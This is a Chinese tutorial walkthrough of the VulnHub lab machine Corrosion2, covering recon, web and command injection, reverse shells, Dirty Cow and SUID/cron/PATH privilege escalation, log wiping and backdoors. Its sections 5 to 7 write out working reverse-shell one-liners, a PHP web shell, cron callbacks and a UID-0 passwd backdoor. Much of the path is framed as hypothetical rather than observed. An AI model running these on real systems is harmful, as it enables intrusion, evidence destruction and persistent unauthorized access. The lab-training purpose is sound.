从信息收集到权限提升：Corrosion2靶机渗透实战全解析

1. 项目概述：从靶机到实战思维的跨越

在网络安全的学习路径上，很多人都会经历一个从理论到实践的迷茫期。看懂了SQL注入的原理，却不知道如何在一个真实的、哪怕只是模拟的环境里找到注入点；理解了缓冲区溢出的概念，但面对一个二进制程序无从下手。这正是像VulnHub这样的平台存在的价值——它提供了一系列精心设计的、存在已知漏洞的虚拟机镜像（我们称之为“靶机”），供安全爱好者在一个完全合法的沙箱环境中进行实战演练。今天我们要深入拆解的，就是其中一台名为Corrosion2的靶机。

Corrosion2并非一个简单的“签到”式靶机，它模拟了一个相对真实的网络服务环境，渗透路径需要综合运用信息收集、Web应用漏洞利用、权限提升等多种技能。完成它的过程，就像完成一次小型的渗透测试项目，从外部侦察开始，一步步深入内网，最终拿到最高权限。这不仅仅是执行几个命令，更重要的是理解每一步背后的逻辑：为什么要扫描这个端口？这个服务版本可能存在什么弱点？拿到一个低权限shell后，下一步该往哪个方向思考？本文将带你完整走通Corrosion2的渗透流程，并重点剖析其中关键的提权技巧，同时也会分享我在搭建这类实验环境时的一些配置心得，确保你能在自己的机器上复现整个实战过程。

2. 环境准备与靶机配置详解

工欲善其事，必先利其器。一个稳定、隔离的实验环境是安全练习的前提。很多人卡在第一步，不是因为技术问题，而是因为虚拟机网络配置混乱或者靶机无法启动。

2.1 攻击机与靶机平台选型

通常，我们会采用“双虚拟机”架构：一台作为攻击机，一台作为靶机。攻击机首选Kali Linux，因为它预装了绝大多数渗透测试工具，从信息收集的Nmap、Dirb，到漏洞利用的Metasploit、Sqlmap，再到后渗透的Mimikatz、LinPEAS，几乎应有尽有。如果你的主机性能足够，使用VMware Workstation Pro或VirtualBox同时运行两台虚拟机是最佳选择。

对于靶机Corrosion2，你需要从VulnHub官网找到它的下载页面。这里有个关键点：VulnHub上的靶机镜像格式多为OVA或7z压缩包。下载后，如果是OVA文件，可以直接通过VMware或VirtualBox的“导入”功能加载，它会自动创建一台配置好的虚拟机。我个人的习惯是，在导入后，立即将虚拟机的网络适配器设置为“NAT模式”或“仅主机模式”。NAT模式下，靶机和你的攻击机（Kali）相当于连接到了同一个虚拟路由器下，它们可以互相通信，但与外网隔离，这是最常用且安全的设置。仅主机模式则创建了一个完全封闭的虚拟网络，只有你的主机和虚拟机之间可以通信，隔离性更强。

注意：切勿在桥接模式下运行存在已知高危漏洞的靶机，尤其是你的主机连接着公司或校园网时。桥接模式会让靶机获得和你物理机同网段的真实IP，其开放的危险服务可能对整个局域网造成安全风险，这是极不负责且可能违法的行为。

2.2 网络发现与IP定位

环境启动后，第一个挑战往往是：我知道靶机在运行，但不知道它的IP地址是什么。这里有几个实用的方法。

首先，在你的Kali攻击机上，使用ifconfig或ip addr命令查看自己的IP地址。例如，你的Kali IP是192.168.56.101，那么靶机很可能在同一个网段，比如192.168.56.0/24。

接下来，使用Nmap进行存活主机扫描。最快速的方式是使用Ping扫描：

sudo nmap -sn 192.168.56.0/24

这个命令会发送ICMP回声请求，列出所有在线的主机。但有些靶机可能禁用了Ping响应。因此，更可靠的方法是使用ARP扫描，因为它在局域网内无需经过网关，且无法被轻易屏蔽：

sudo netdiscover -r 192.168.56.0/24

或者使用Nmap的ARP扫描：

sudo nmap -PR -sn 192.168.56.0/24

通常，扫描结果中除了你的Kali和物理主机（如果有的话），那个陌生的IP就是靶机。记下这个IP，我们后续的所有操作都将围绕它展开。假设我们发现的靶机IP是192.168.56.102。

3. 全方位信息收集与侦察

渗透测试中，信息收集的广度与深度直接决定了后续攻击的效率和成功率。对于Corrosion2，我们不能一上来就盲目攻击，而是要先把它“摸透”。

3.1 端口与服务探测

使用Nmap进行全面的端口扫描是我们的第一步。我建议分两步走：先快速扫描常用端口，再针对开放端口进行精细化版本探测。

# 第一步：快速扫描前1000个常用端口 sudo nmap -sS -T4 192.168.56.102 # 第二步：针对发现的开放端口，进行详细的版本和服务探测 sudo nmap -sV -sC -O -p <开放的端口列表> 192.168.56.102 -oA corrosion2_scan

这里解释一下参数：

• -sS: TCP SYN扫描，一种半开放扫描，速度快且相对隐蔽。
• -T4: 设置扫描速度为4级（共5级），在可控环境下可以加快速度。
• -sV: 探测服务版本。
• -sC: 使用默认的Nmap脚本进行更深入的探测。
• -O: 尝试识别操作系统。
• -p: 指定端口，例如如果第一步发现开了22,80端口，这里就写-p 22,80。
• -oA: 将结果以三种格式（普通、XML、可读）输出到文件，便于后续查阅。

假设扫描结果显示开放了以下端口：

• 22/tcp: OpenSSH 7.6p1 (协议版本，可能提示操作系统是Ubuntu)
• 80/tcp: Apache httpd 2.4.29 (服务软件及版本)
• 2112/tcp: 一个未知服务，版本信息可能显示为“自定义”或空白。

端口80（HTTP）和2112（未知）立即引起了我们的兴趣。Web服务通常是突破口，而非常规端口（2112）上运行的服务，很可能就是靶机的“特色”所在，也是容易出问题的地方。

3.2 Web应用目录与文件枚举

针对80端口的Web服务，我们首先要进行目录爆破，寻找隐藏的路径、管理后台、配置文件或脚本文件。常用的工具有Dirb、Dirbuster、Gobuster等。这里以Dirb为例，它内置了一个不错的字典。

dirb http://192.168.56.102 /usr/share/wordlists/dirb/common.txt -o dirb_scan.txt

同时，我们一定要手动访问网站http://192.168.56.102，用浏览器查看。查看页面源代码，寻找注释中的敏感信息（如密码、路径、用户名）。使用Burp Suite或浏览器开发者工具（F12）查看网络请求和响应头，有时能发现像X-Powered-By: PHP/7.2.24这样的框架信息，或者泄露的目录信息。

对于2112端口，我们同样要用浏览器或curl命令去访问一下：

curl -v http://192.168.56.102:2112

看看它返回什么。是一个Web服务？还是一个自定义的TCP服务？如果是一个登录界面或任何形式的交互接口，我们都需要记录下来，作为后续重点分析的对象。

4. 漏洞挖掘与初始访问突破

信息收集完成后，我们就要开始分析攻击面，寻找薄弱点。

4.1 Web路径漏洞利用实战

假设通过目录扫描，我们在80端口发现了以下关键路径：

• /admin/： 一个登录后台。
• /backup/： 目录下列出了一个名为website_backup.zip的文件。
• /index.php： 主站，可能存在参数。

场景一：备份文件泄露/backup/website_backup.zip是一个典型的“备份文件泄露”漏洞。开发者将包含源码甚至配置文件的备份包放在Web可访问目录，是极其常见的错误。我们立即下载并解压它：

wget http://192.168.56.102/backup/website_backup.zip unzip website_backup.zip

解压后，仔细检查所有文件。重点关注：

1. 配置文件： 如config.php,database.php,.env等，里面可能有数据库连接密码。
2. 源码文件： 查看admin/index.php或login.php，审计登录逻辑。是否存在SQL注入？密码是否硬编码？是否有文件包含漏洞（如include($_GET[‘page’])）？
3. 注释信息： 源码注释里可能写着测试账号，比如// test:test123。

在Corrosion2的设定中，很可能从这个备份文件中，你能找到通往下一个环节的钥匙，比如数据库密码、加密的凭据或者隐藏的管理员功能路径。

场景二：SQL注入攻击如果主站index.php有一个参数，比如http://192.168.56.102/index.php?id=1，我们就要测试SQL注入。手动测试可以在参数后加单引号‘，观察页面是否报错或行为异常。

curl "http://192.168.56.102/index.php?id=1'"

如果存在错误，可以进一步使用Sqlmap进行自动化注入测试，获取数据库信息：

sqlmap -u "http://192.168.56.102/index.php?id=1" --batch --dbs

--batch参数会让Sqlmap以非交互模式运行，自动选择默认选项。--dbs用于枚举数据库。如果成功，你可能会看到数据库名，接下来可以枚举表、列，最终拖取用户表的数据，获取登录凭据。

4.2 非常规端口服务渗透

端口2112是此靶机的关键。访问http://192.168.56.102:2112，假设它返回了一个简单的登录框，或者一个命令行接口。我们需要用更多工具来探测它。

1. Netcat连接：nc 192.168.56.102 2112，尝试发送一些随机数据，看服务如何响应。有时它会回显一个欢迎信息或提示符。
2. Nmap脚本扫描： 使用Nmap的漏洞脚本针对此端口进行深度探测。

   nmap -sV -p 2112 --script vuln,default,auth 192.168.56.102

3. 手动模糊测试： 如果它是一个自定义应用，可能存在缓冲区溢出。我们可以用Python脚本发送一长串的‘A’字符，观察服务是否崩溃。

   import socket buffer = "A" * 1000 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.56.102", 2112)) s.send(buffer.encode()) print(s.recv(1024)) s.close()

在Corrosion2中，这个端口服务很可能存在某种逻辑漏洞，比如认证绕过，或者通过发送特定指令能触发命令执行。例如，它可能期待接收一个“LOGIN username password”格式的指令，但如果我们发送“LOGIN ‘;id;’”，而服务端没有做好过滤，就可能执行id命令。这就是命令注入漏洞。

实操心得：在测试未知服务时，务必在攻击机本地用tcpdump或Wireshark抓包，观察你和靶机之间的原始通信。这能帮你理解协议格式，有时比黑盒测试更有效。命令是sudo tcpdump -i vboxnet0 host 192.168.56.102 -w capture.pcap（假设你的虚拟网卡是vboxnet0）。

5. 获取初始Shell与内网站稳脚跟

通过上述漏洞（比如从备份文件中找到的密码登录了Web后台，或者通过2112端口的命令注入），我们最终的目标是获得一个反向Shell，即在靶机上执行命令，让靶机主动连接到我们攻击机监听的一个端口，从而我们获得一个交互式的命令行。

5.1 反向Shell的建立与管理

假设我们在Web应用的文件上传功能处，上传了一个包含PHP代码的图片马（如shell.jpg.php），并且服务器配置错误导致它被当作PHP执行。我们的PHP代码可以是：

<?php system($_GET[‘cmd’]); ?>

访问http://192.168.56.102/uploads/shell.jpg.php?cmd=id，就能执行命令。但这只是一个Web Shell，功能有限。我们需要一个更稳定的反向Shell。

在Kali上，先用Netcat监听一个端口：

nc -lvnp 4444

然后，通过Web Shell执行命令，让靶机连接到我们。由于靶机环境可能受限，我们需要根据靶机系统选择不同的Payload。

对于Linux靶机：

# Bash反向Shell bash -c ‘bash -i >& /dev/tcp/192.168.56.101/4444 0>&1’ # 如果bash不可用，用Python python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.56.101”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

对于Windows靶机（虽然Corrosion2很可能是Linux，但作为知识扩展）：

powershell -c “$client = New-Object System.Net.Sockets.TCPClient(‘192.168.56.101’,4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()”

执行成功后，你的Netcat监听端就会获得一个Shell。但这个Shell往往是不稳定的（比如按Ctrl+C会中断），而且没有TAB补全等功能。我们需要把它“升级”为一个完全交互式的TTY Shell。

5.2 Shell稳定性强化与交互升级

在获得的简陋Shell中，依次执行以下命令：

# 1. 使用Python生成一个PTY（伪终端） python -c ‘import pty; pty.spawn(“/bin/bash”)’ # 2. 然后按 Ctrl+Z 将当前会话挂起到后台 # 3. 在Kali本地终端中，设置终端类型并接管 stty raw -echo fg # 4. 最后，重置终端并设置环境变量 reset export TERM=xterm-256color export SHELL=bash

完成这些步骤后，你就获得了一个功能完整的交互式Shell，可以正常使用上下键历史记录、TAB补全、文本编辑器等。

现在，我们算是正式在靶机内部站稳了脚跟。第一个命令永远是whoami和id，查看当前用户权限。通常，通过Web漏洞获得的Shell权限很低，是一个如www-data（Web服务用户）或apache这样的非特权用户。我们的下一个目标，就是将自己提升为root用户。

6. Linux系统提权深度剖析

提权是渗透测试中最考验综合能力和知识储备的环节。它要求你对Linux系统有深入的理解。思路通常分为两大类：内核漏洞利用和系统配置错误利用。

6.1 自动化信息收集脚本运用

在手动检查之前，先用自动化脚本快速扫描一遍系统，它能高效地发现常见提权向量。最著名的两个工具是LinPEAS和LinEnum。

首先，在你的Kali上启动一个HTTP服务，方便将脚本传输到靶机：

python3 -m http.server 8000 # 或者用Python2: python -m SimpleHTTPServer 8000

然后，在靶机的Shell中，下载并执行LinPEAS：

cd /tmp wget http://192.168.56.101:8000/linpeas.sh chmod +x linpeas.sh ./linpeas.sh

LinPEAS会运行几分钟，输出一份颜色标记的报告（红色/黄色代表高危项）。它会检查：

• SUID/GUID文件： 哪些设置了特殊权限位的可执行文件。
• 内核版本： 是否对应存在公开的本地提权漏洞（如Dirty Cow）。
• Cron计划任务： 是否有全局可写的任务脚本。
• 环境变量：PATH是否包含可写目录。
• sudo权限： 当前用户能否以root身份运行特定命令（sudo -l）。
• 进程与服务： 是否有以root权限运行的服务，其配置文件是否可写。
• 密码与密钥： 在/home目录、/opt、配置文件、历史记录中寻找密码或SSH私钥。

仔细阅读LinPEAS的输出，任何标红或标黄的地方都是潜在的突破口。

6.2 内核漏洞提权实战：以Dirty Cow为例

如果LinPEAS提示内核版本较旧（例如Linux内核版本低于某个特定版本），并且提到了“Dirty Cow”（CVE-2016-5195），那么我们可以尝试利用这个著名的竞争条件漏洞。

首先，在靶机上确认内核版本：

uname -a

假设版本是Linux corrosion2 4.4.0-21-generic，这正在Dirty Cow的影响范围内。

接下来，我们需要一个 exploit 代码。在Kali上搜索本地提权漏洞利用代码：

searchsploit dirty cow

它会列出可用的利用脚本路径，例如/usr/share/exploitdb/exploits/linux/local/40839.c。我们将这个C文件传输到靶机，编译并运行。

# 在Kali上，将exp复制到HTTP服务目录 cp /usr/share/exploitdb/exploits/linux/local/40839.c /var/www/html/ # 确保HTTP服务运行（如Apache: sudo systemctl start apache2） # 在靶机上 cd /tmp wget http://192.168.56.101/40839.c gcc 40839.c -o dirtycow -pthread ./dirtycow

运行后，如果 exploit 成功，它会将当前用户加入到/etc/passwd文件中的root组，或者创建一个新的具有root权限的用户。根据不同的exp，提权方式略有不同，请仔细阅读exp源码开头的说明。成功后，执行su切换到root或新创建的用户，输入密码（exp中设定的），即可获得root shell。

注意事项：内核漏洞利用（如Dirty Cow）有一定风险可能导致系统不稳定甚至崩溃。在真实渗透测试中，需谨慎评估，最好在获得授权且不影响业务的情况下进行。在VulnHub靶机中则可以放心尝试。

6.3 利用配置错误提权：SUID与Cron任务

如果内核版本较新，没有公开漏洞，那么配置错误就是我们主要的提权方向。

SUID提权： SUID（Set User ID）是一种特殊的文件权限，它允许用户以文件所有者的权限来执行该文件。例如，/bin/passwd的SUID位被设置，所有者是root，所以普通用户执行它时可以修改自己的密码（需要写入/etc/shadow）。 查找具有SUID位且所有者是root的可疑文件：

find / -type f -perm -4000 -user root 2>/dev/null

常见的、本不该设置SUID位的程序如果出现了，就可能被利用。例如：

• find:find . -exec /bin/sh \; -quit可以直接获得root shell。
• vim/vi: 如果vim有SUID位，可以在vim内执行:!sh来启动一个shell。
• bash: 如果bash有SUID位，直接执行bash -p即可获得root权限的bash（-p参数表示不重置有效用户ID）。
• cp: 如果cp有SUID位，可以覆盖敏感文件如/etc/passwd或/etc/shadow。

Cron任务提权： Cron是Linux的定时任务服务。如果有一个以root权限运行的Cron任务，并且其执行的脚本或脚本所在目录对当前用户可写，我们就可以修改这个脚本，植入我们的反向Shell代码。 查找系统Cron任务：

cat /etc/crontab ls -la /etc/cron.d/ ls -la /etc/cron.hourly/ /etc/cron.daily/ /etc/cron.weekly/ /etc/cron.monthly/

更细致地，可以查看每个用户的Cron任务（需要相应权限）：

crontab -l # 查看当前用户的 crontab -l -u root # 查看root的（需要sudo权限）

假设我们发现一个任务/usr/local/bin/cleanup.sh每分钟以root身份运行，并且这个文件我们（www-data用户）可以写入。那么：

echo ‘bash -c “bash -i >& /dev/tcp/192.168.56.101/5555 0>&1”’ >> /usr/local/bin/cleanup.sh chmod +x /usr/local/bin/cleanup.sh

然后在Kali上监听5555端口，等待一分钟后，就会收到来自靶机root权限的反向Shell。

6.4 利用环境变量PATH提权

这是一种相对隐蔽但有效的提权方式。如果有一个SUID程序，它在内部调用了另一个命令（比如system(“ls”)），但没有使用绝对路径（/bin/ls），那么系统就会去PATH环境变量指定的目录中寻找ls。 我们可以通过控制PATH，让这个SUID程序执行我们自己的恶意ls。

1. 首先，找到一个SUID程序，用strings或ltrace分析它调用了哪些命令。

   strings /usr/local/bin/suid_program | grep -E “system|exec|popen”

2. 如果发现它调用了service（假设路径是service而不是/usr/sbin/service），我们就可以进行劫持。
3. 创建一个名为service的恶意脚本：

   #!/bin/bash /bin/bash -p

4. 将这个脚本放在一个我们有写权限的目录，比如/tmp，并添加执行权限。

   echo ‘#!/bin/bash’ > /tmp/service echo ‘/bin/bash -p’ >> /tmp/service chmod +x /tmp/service

5. 修改当前用户的PATH环境变量，将/tmp放在最前面。

   export PATH=/tmp:$PATH

6. 运行那个SUID程序。当它尝试执行service时，会优先找到/tmp/service并执行，从而给我们一个root shell。

7. 后渗透清理与痕迹管理

在成功提权为root后，渗透测试并未完全结束。一个专业的渗透测试者还需要考虑如何清理痕迹（在获得授权的前提下），以及如何巩固访问权限。

7.1 日志清理与历史记录清除

Linux系统会记录大量日志，我们的操作很可能被记录在案。主要需要关注的日志文件有：

• /var/log/auth.log或/var/log/secure: 记录认证信息（SSH登录、sudo使用等）。
• /var/log/apache2/access.log和error.log: 记录Web访问日志。
• /var/log/syslog: 系统通用日志。
• ~/.bash_history: 当前用户的命令历史记录。

清理这些日志需要root权限。但请注意，在真实授权的渗透测试中，是否清理日志需严格遵守测试协议（Rules of Engagement）。在VulnHub练习中，我们可以操作以学习方法。

# 清空日志文件内容（注意，直接删除文件会引起怀疑） echo ‘’ > /var/log/auth.log echo ‘’ > /var/log/apache2/access.log # 更多日志文件... # 清除当前root用户的命令历史 history -c # 或者直接清空历史记录文件 echo ‘’ > ~/.bash_history # 还要清除其他可能存在的shell历史，如zsh的 .zsh_history

更隐蔽的做法不是清空，而是有选择地删除与我们IP或用户名相关的特定行，这需要用到sed等文本处理工具。

7.2 创建持久化后门

为了在靶机重启或我们连接断开后还能维持访问，需要创建后门。方法有很多：

1. 添加SSH密钥： 将我们的公钥添加到root用户的authorized_keys文件中。

   echo ‘ssh-rsa AAAAB3NzaC1yc2E...（你的公钥内容）’ >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys

   之后就可以直接用私钥SSH登录root：ssh -i id_rsa root@192.168.56.102。
2. 创建特权用户： 直接在/etc/passwd文件中添加一个UID为0（root）的用户。

   # 生成一个密码为’toor’的加密字符串 openssl passwd -1 -salt xyz toor # 输出类似：$1$xyz$U9tLZRDL7qEoF6v.6b6Bk1 # 在/etc/passwd末尾添加一行 echo ‘backdoor:$1$xyz$U9tLZRDL7qEoF6v.6b6Bk1:0:0:root:/root:/bin/bash’ >> /etc/passwd

   现在就可以用用户名backdoor，密码toor进行SSH或su登录了。
3. Cron持久化： 添加一个每分钟运行的Cron任务，持续回连我们的监听端。

   (crontab -l 2>/dev/null; echo “* * * * * /bin/bash -c ‘bash -i >& /dev/tcp/192.168.56.101/6666 0>&1’”) | crontab -

   在Kali上持续监听6666端口即可。

8. 渗透流程复盘与防御思考

完成整个Corrosion2靶机的渗透后，我们有必要从防御者的角度进行复盘，思考如何避免这些安全问题。

攻击链复盘：

1. 信息泄露： 备份文件website_backup.zip被放置在Web目录下。防御措施：严禁将源码、配置文件、备份文件存放在Web可访问路径。构建和部署流程应自动化，避免手动操作遗留文件。
2. 服务配置不当： 2112端口的自定义服务存在命令注入漏洞。防御措施：对所有用户输入进行严格的过滤和验证，使用白名单机制。避免使用system()、exec()等危险函数直接执行用户输入。
3. 权限提升： 系统内核未及时更新（存在Dirty Cow漏洞），或者存在配置错误的SUID文件、不安全的Cron任务。防御措施：
   • 及时更新： 定期更新操作系统和软件包，修补已知漏洞。
   • 权限最小化： 定期审计SUID/GUID文件，移除不必要的特殊权限。使用find / -type f -perm /6000定期检查。
   • Cron任务审计： 确保Cron任务脚本的权限设置正确，避免全局可写。使用ls -lR /etc/cron* /var/spool/cron进行审计。
   • 强化环境变量： 在SUID/SGID程序中，或在服务启动脚本中，显式设置安全的PATH环境变量。

渗透测试思维培养： 通过Corrosion2这样的靶机练习，我们培养的是一种系统性的“攻击者思维”。它要求我们：

• 耐心与细致： 不放过任何一点信息，一个不起眼的端口、一个注释、一个js文件都可能成为突破口。
• 联想与串联： 将分散的信息点串联起来。从备份文件中找到的密码，可能用于SSH登录；从Web漏洞中获得的低权限Shell，需要结合系统信息寻找提权路径。
• 工具与手动结合： 自动化工具（如LinPEAS）能提高效率，但手动分析和理解漏洞原理才是根本。不要成为只会运行脚本的“脚本小子”。

最后，关于环境配置，我个人的体会是，在本地用虚拟机搭建靶场是最稳妥的方式。如果遇到网络问题导致靶机无法获取IP，可以检查虚拟机的网络适配器设置，确保是NAT或仅主机模式，并尝试在靶机内手动重启网络服务（sudo systemctl restart networking或sudo dhclient）。对于更复杂的网络拓扑学习，可以尝试使用GNS3或EVE-NG来模拟多台设备组成的网络，但那需要更多的网络知识储备。从像Corrosion2这样的单一靶机开始，扎实走通“信息收集-漏洞利用-权限提升-后渗透”的完整流程，是构建你网络安全实战能力最坚实的第一步。